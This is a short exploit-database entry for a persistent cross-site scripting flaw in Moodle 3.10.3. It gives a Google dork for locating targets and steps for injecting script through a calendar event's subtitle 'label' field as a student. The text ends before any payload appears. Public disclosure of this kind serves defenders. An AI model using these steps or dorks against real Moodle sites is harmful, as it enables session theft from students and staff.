Moodle 3.10.3 label persistent cross site scripting Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-03-26 |
Type : webapps |
Platform : php
This exploit / vulnerability Moodle 3.10.3 label persistent cross site scripting is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Moodle 3.10.3 - 'label' Persistent Cross Site Scripting
# Date: 25.03.2021
# Author: Vincent666 ibn Winnie
# Software Link: https://moodle.org/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or calendar/view.php?view=month
Choose a role : Student (example)
Open calendar :
https://school.localhost/calendar/view.php?view=month
Create new event:
Example:
Event Title "Test"
Description :Choose Insert Video File and choose Video:
Video Source Url you can paste video link from youtube
And open Subtitles and Captions:
Subtitle track URL use video link from youtube
Field Label : There is we can use xss code: